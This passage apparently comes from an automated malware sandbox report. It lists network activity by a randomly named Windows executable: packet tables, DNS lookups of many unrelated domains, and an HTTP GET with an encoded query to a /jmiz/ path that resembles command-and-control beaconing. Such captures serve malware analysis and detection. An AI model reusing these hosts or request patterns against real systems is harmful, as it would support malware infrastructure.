                                                      Jul 3, 2024 17:58:48.803347111 CEST8049764162.43.101.114192.168.2.6
                                                      Jul 3, 2024 17:58:48.803407907 CEST4976480192.168.2.6162.43.101.114
                                                      Jul 3, 2024 17:58:49.544719934 CEST4976480192.168.2.6162.43.101.114
                                                      Jul 3, 2024 17:58:50.564768076 CEST4976580192.168.2.6162.43.101.114
                                                      Jul 3, 2024 17:58:50.669425964 CEST8049765162.43.101.114192.168.2.6
                                                      Jul 3, 2024 17:58:50.669502020 CEST4976580192.168.2.6162.43.101.114
                                                      Jul 3, 2024 17:58:50.671372890 CEST4976580192.168.2.6162.43.101.114
                                                      Jul 3, 2024 17:58:50.676594973 CEST8049765162.43.101.114192.168.2.6
                                                      Jul 3, 2024 17:58:51.491303921 CEST8049765162.43.101.114192.168.2.6
                                                      Jul 3, 2024 17:58:51.491368055 CEST8049765162.43.101.114192.168.2.6
                                                      Jul 3, 2024 17:58:51.491379976 CEST8049765162.43.101.114192.168.2.6
                                                      Jul 3, 2024 17:58:51.491491079 CEST8049765162.43.101.114192.168.2.6
                                                      Jul 3, 2024 17:58:51.491684914 CEST4976580192.168.2.6162.43.101.114
                                                      Jul 3, 2024 17:58:51.491684914 CEST4976580192.168.2.6162.43.101.114
                                                      Jul 3, 2024 17:58:51.496514082 CEST4976580192.168.2.6162.43.101.114
                                                      Jul 3, 2024 17:58:51.501416922 CEST8049765162.43.101.114192.168.2.6
                                                      Jul 3, 2024 17:58:56.904232025 CEST4976680192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:58:56.909893036 CEST804976645.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:58:56.913892984 CEST4976680192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:58:56.913892984 CEST4976680192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:58:56.919050932 CEST804976645.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:58:58.419847012 CEST4976680192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:58:58.425890923 CEST804976645.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:58:58.425968885 CEST4976680192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:58:59.438263893 CEST4976780192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:58:59.965039015 CEST804976745.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:58:59.965121031 CEST4976780192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:58:59.967823982 CEST4976780192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:58:59.973546028 CEST804976745.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:01.483325958 CEST4976780192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:01.488348007 CEST804976745.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:01.492113113 CEST4976780192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:02.508970022 CEST4976980192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:02.516083956 CEST804976945.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:02.516151905 CEST4976980192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:02.519221067 CEST4976980192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:02.525757074 CEST804976945.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:02.527412891 CEST804976945.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:04.029076099 CEST4976980192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:04.038081884 CEST804976945.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:04.038129091 CEST4976980192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:05.065998077 CEST4977080192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:05.071120977 CEST804977045.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:05.078006029 CEST4977080192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:05.078006029 CEST4977080192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:05.082952976 CEST804977045.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:06.416336060 CEST804977045.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:06.466646910 CEST4977080192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:11.417226076 CEST804977045.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:11.418131113 CEST4977080192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:11.421997070 CEST4977080192.168.2.645.113.122.18
                                                      Jul 3, 2024 17:59:11.426913977 CEST804977045.113.122.18192.168.2.6
                                                      Jul 3, 2024 17:59:16.638803959 CEST4977180192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:16.651665926 CEST8049771142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:16.651829958 CEST4977180192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:16.653633118 CEST4977180192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:16.660763025 CEST8049771142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:17.305421114 CEST8049771142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:17.305635929 CEST8049771142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:17.306071043 CEST4977180192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:17.306725979 CEST8049771142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:17.310065985 CEST4977180192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:18.169732094 CEST4977180192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:19.188713074 CEST4977280192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:19.193675041 CEST8049772142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:19.193918943 CEST4977280192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:19.197988987 CEST4977280192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:19.203833103 CEST8049772142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:19.885412931 CEST8049772142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:19.885433912 CEST8049772142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:19.885447025 CEST8049772142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:19.885533094 CEST4977280192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:19.885587931 CEST4977280192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:20.700990915 CEST4977280192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:21.721982956 CEST4977380192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:21.726933002 CEST8049773142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:21.728550911 CEST4977380192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:21.734000921 CEST4977380192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:21.738989115 CEST8049773142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:21.739139080 CEST8049773142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:22.353934050 CEST8049773142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:22.358095884 CEST8049773142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:22.358115911 CEST8049773142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:22.358149052 CEST4977380192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:22.358195066 CEST4977380192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:23.233987093 CEST4977380192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:24.252274990 CEST4977480192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:24.257247925 CEST8049774142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:24.257323027 CEST4977480192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:24.259685993 CEST4977480192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:24.264568090 CEST8049774142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:24.911488056 CEST8049774142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:24.913105011 CEST8049774142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:24.913119078 CEST8049774142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:24.913232088 CEST4977480192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:24.913275957 CEST4977480192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:24.916093111 CEST4977480192.168.2.6142.250.74.211
                                                      Jul 3, 2024 17:59:24.921000004 CEST8049774142.250.74.211192.168.2.6
                                                      Jul 3, 2024 17:59:38.281486988 CEST4977580192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:38.288275003 CEST804977564.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:38.288347006 CEST4977580192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:38.291156054 CEST4977580192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:38.297920942 CEST804977564.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:38.943396091 CEST804977564.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:38.943422079 CEST804977564.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:38.944760084 CEST4977580192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:39.794687986 CEST4977580192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:40.813460112 CEST4977680192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:40.820841074 CEST804977664.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:40.820928097 CEST4977680192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:40.822772026 CEST4977680192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:40.829411983 CEST804977664.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:41.482255936 CEST804977664.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:41.482352018 CEST804977664.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:41.486171961 CEST4977680192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:42.325953960 CEST4977680192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:43.345993042 CEST4977780192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:43.356406927 CEST804977764.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:43.356570005 CEST4977780192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:43.359024048 CEST4977780192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:43.363940954 CEST804977764.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:43.363981009 CEST804977764.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:44.008351088 CEST804977764.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:44.008929014 CEST804977764.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:44.008994102 CEST4977780192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:44.872878075 CEST4977780192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.181757927 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.186671019 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.186753035 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.190094948 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.194900036 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854329109 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854351044 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854362011 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854484081 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854484081 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.854496002 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854540110 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.854681969 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854697943 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854723930 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.854890108 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854912043 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854927063 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.854928970 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.854981899 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.859322071 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859390020 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859400988 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859431028 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.859591961 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859605074 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.859637976 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.951803923 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.951843023 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.951853991 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.951900005 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.951972008 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.951977015 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.952023029 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.952064037 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.952204943 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.952303886 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.952316046 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.952353954 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.952522039 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.952563047 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.952702999 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.952763081 CEST804977864.190.62.22192.168.2.6
                                                      Jul 3, 2024 17:59:46.952805042 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.957142115 CEST4977880192.168.2.664.190.62.22
                                                      Jul 3, 2024 17:59:46.962333918 CEST804977864.190.62.22192.168.2.6

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Jul 3, 2024 17:56:34.946772099 CEST6550953192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:56:35.040492058 CEST53655091.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:56:50.814649105 CEST6409553192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:56:51.050762892 CEST53640951.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:57:04.752461910 CEST5416253192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:57:04.769181967 CEST53541621.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:57:18.157937050 CEST5156953192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:57:18.650569916 CEST53515691.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:57:31.877427101 CEST6160353192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:57:32.602283001 CEST53616031.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:57:46.158896923 CEST6357453192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:57:46.189277887 CEST53635741.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:57:59.440041065 CEST5490053192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:57:59.456058979 CEST53549001.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:58:13.018013000 CEST6238453192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:58:13.061901093 CEST53623841.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:58:26.508449078 CEST5810353192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:58:27.186599016 CEST53581031.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:58:41.862185955 CEST6496653192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:58:42.874016047 CEST6496653192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:58:42.876082897 CEST53649661.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:58:42.880778074 CEST53649661.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:58:56.504539967 CEST6490853192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:58:56.899667025 CEST53649081.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:59:16.424881935 CEST5949453192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:59:16.636112928 CEST53594941.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:59:29.923494101 CEST5973453192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:59:30.187005997 CEST53597341.1.1.1192.168.2.6
                                                      Jul 3, 2024 17:59:38.252311945 CEST6030153192.168.2.61.1.1.1
                                                      Jul 3, 2024 17:59:38.278227091 CEST53603011.1.1.1192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Jul 3, 2024 17:56:34.946772099 CEST192.168.2.61.1.1.10x8a30Standard query (0)www.fondazionegtech.orgA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:56:50.814649105 CEST192.168.2.61.1.1.10x3ebbStandard query (0)www.mengistiebethlehem.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:04.752461910 CEST192.168.2.61.1.1.10xd954Standard query (0)www.ad14.funA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:18.157937050 CEST192.168.2.61.1.1.10xf577Standard query (0)www.epicbazaarhub.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:31.877427101 CEST192.168.2.61.1.1.10x4a8eStandard query (0)www.rz6grmvv.shopA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:46.158896923 CEST192.168.2.61.1.1.10xd8ecStandard query (0)www.hellokong.xyzA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:59.440041065 CEST192.168.2.61.1.1.10xa159Standard query (0)www.architect-usschool.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:13.018013000 CEST192.168.2.61.1.1.10x4641Standard query (0)www.easybackpage.netA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:26.508449078 CEST192.168.2.61.1.1.10x6e34Standard query (0)www.superunicornpalace.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:41.862185955 CEST192.168.2.61.1.1.10x9980Standard query (0)www.tedjp-x.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:42.874016047 CEST192.168.2.61.1.1.10x9980Standard query (0)www.tedjp-x.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:56.504539967 CEST192.168.2.61.1.1.10xafa4Standard query (0)www.3cubesinterior.inA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:59:16.424881935 CEST192.168.2.61.1.1.10x14cbStandard query (0)www.artvectorcraft.storeA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:59:29.923494101 CEST192.168.2.61.1.1.10xcd5aStandard query (0)www.macklaer.comA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:59:38.252311945 CEST192.168.2.61.1.1.10x1830Standard query (0)www.hondamechanic.todayA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Jul 3, 2024 17:56:35.040492058 CEST1.1.1.1192.168.2.60x8a30No error (0)www.fondazionegtech.orgsitestudio.itCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:56:35.040492058 CEST1.1.1.1192.168.2.60x8a30No error (0)sitestudio.it89.31.76.10A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:56:51.050762892 CEST1.1.1.1192.168.2.60x3ebbNo error (0)www.mengistiebethlehem.com208.91.197.13A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:04.769181967 CEST1.1.1.1192.168.2.60xd954No error (0)www.ad14.fun188.114.96.3A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:04.769181967 CEST1.1.1.1192.168.2.60xd954No error (0)www.ad14.fun188.114.97.3A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:18.650569916 CEST1.1.1.1192.168.2.60xf577No error (0)www.epicbazaarhub.comepicbazaarhub.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:57:18.650569916 CEST1.1.1.1192.168.2.60xf577No error (0)epicbazaarhub.com192.185.208.8A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:32.602283001 CEST1.1.1.1192.168.2.60x4a8eNo error (0)www.rz6grmvv.shop121.254.178.230A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:46.189277887 CEST1.1.1.1192.168.2.60xd8ecNo error (0)www.hellokong.xyz203.161.49.220A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:57:59.456058979 CEST1.1.1.1192.168.2.60xa159No error (0)www.architect-usschool.com217.160.0.84A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:13.061901093 CEST1.1.1.1192.168.2.60x4641No error (0)www.easybackpage.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:58:13.061901093 CEST1.1.1.1192.168.2.60x4641No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:27.186599016 CEST1.1.1.1192.168.2.60x6e34No error (0)www.superunicornpalace.comsuperunicornpalace.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:58:27.186599016 CEST1.1.1.1192.168.2.60x6e34No error (0)superunicornpalace.com144.208.124.10A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:42.876082897 CEST1.1.1.1192.168.2.60x9980No error (0)www.tedjp-x.com162.43.101.114A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:42.880778074 CEST1.1.1.1192.168.2.60x9980No error (0)www.tedjp-x.com162.43.101.114A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:58:56.899667025 CEST1.1.1.1192.168.2.60xafa4No error (0)www.3cubesinterior.in3cubesinterior.inCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:58:56.899667025 CEST1.1.1.1192.168.2.60xafa4No error (0)3cubesinterior.in45.113.122.18A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:59:16.636112928 CEST1.1.1.1192.168.2.60x14cbNo error (0)www.artvectorcraft.storeghs.google.comCNAME (Canonical name)IN (0x0001)false
                                                      Jul 3, 2024 17:59:16.636112928 CEST1.1.1.1192.168.2.60x14cbNo error (0)ghs.google.com142.250.74.211A (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:59:30.187005997 CEST1.1.1.1192.168.2.60xcd5aServer failure (2)www.macklaer.comnonenoneA (IP address)IN (0x0001)false
                                                      Jul 3, 2024 17:59:38.278227091 CEST1.1.1.1192.168.2.60x1830No error (0)www.hondamechanic.today64.190.62.22A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.fondazionegtech.org
                                                      • www.mengistiebethlehem.com
                                                      • www.ad14.fun
                                                      • www.epicbazaarhub.com
                                                      • www.rz6grmvv.shop
                                                      • www.hellokong.xyz
                                                      • www.architect-usschool.com
                                                      • www.easybackpage.net
                                                      • www.superunicornpalace.com
                                                      • www.tedjp-x.com
                                                      • www.3cubesinterior.in
                                                      • www.artvectorcraft.store
                                                      • www.hondamechanic.today

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.64972489.31.76.10806800C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exe
                                                      TimestampBytes transferredDirectionData
                                                      Jul 3, 2024 17:56:35.053853035 CEST352OUTGET /jmiz/?Y6vp=3PLd8j&OdjTHtuX=FlIs+r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p/5DHHhHlE1nDIZgKO5qXvVh1+gwmyYcA+2CCaGrmZckpjuvJQ96WUy8TtzIG0Do= HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.fondazionegtech.org
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
                                                      Jul 3, 2024 17:56:35.766567945 CEST1236INHTTP/1.1 301 Moved Permanently
                                                      Server: openresty
                                                      Date: Wed, 03 Jul 2024 15:56:35 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 1082
                                                      Connection: close
                                                      Cache-Control: max-age=0, private, must-revalidate, max-age=0, must-revalidate, no-cache, no-store, private
                                                      Location: https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&Y6vp=3PLd8j
                                                      Pragma: no-cache
                                                      Expires: Wed, 03 Jul 2024 15:56:35 GMT
                                                      X-XSS-Protection: 1; mode=block
                                                      X-Content-Type-Options: nosniff
                                                      Age: 0
                                                      X-Cache: MISS
                                                      X-BKSrc: 0.3
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 6e 64 61 7a 69 6f 6e 65 67 74 65 63 68 2e 6f 72 67 2f 6a 6d 69 7a 2f 3f 4f 64 6a 54 48 74 75 58 3d 46 6c 49 73 25 32 30 72 38 7a 48 35 49 64 7a 56 79 72 78 46 64 53 59 6a 45 53 48 43 36 46 38 45 44 32 4a 6a 56 38 66 49 68 6f 54 69 45 47 72 69 69 64 77 57 4b 4b 54 76 59 47 46 63 6b 4d 47 79 4e 7a 74 7a 39 66 35 49 31 70 25 32 46 35 44 48 48 68 48 6c 45 31 6e 44 49 5a 67 4b 4f 35 71 58 76 56 68 31 25 32 30 67 77 6d 79 59 63 41 25 32 30 32 43 43 61 47 72 6d 5a 63 6b 70 6a 75 76 4a 51 39 36 57 55 79 38 54 74 7a 49 47 30 44 6f 25 33 44 26 61 6d 70 3b 59 36 76 70 3d 33 50 4c 64 38 6a 27 22 20 2f 3e 0a 0a 20 20 20 20 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta http-equiv="refresh" content="0;url='https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&amp;Y6vp=3PLd8j'" /> <title>Redirecting to https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8TtzIG0Do%3D&amp;Y6vp=3PLd8j</tit
                                                      Jul 3, 2024 17:56:35.766640902 CEST504INData Raw: 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 20 20 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 6f 6e 64 61 7a 69 6f 6e 65 67
                                                      Data Ascii: le> </head> <body> Redirecting to <a href="https://www.fondazionegtech.org/jmiz/?OdjTHtuX=FlIs%20r8zH5IdzVyrxFdSYjESHC6F8ED2JjV8fIhoTiEGriidwWKKTvYGFckMGyNztz9f5I1p%2F5DHHhHlE1nDIZgKO5qXvVh1%20gwmyYcA%202CCaGrmZckpjuvJQ96WUy8Tt


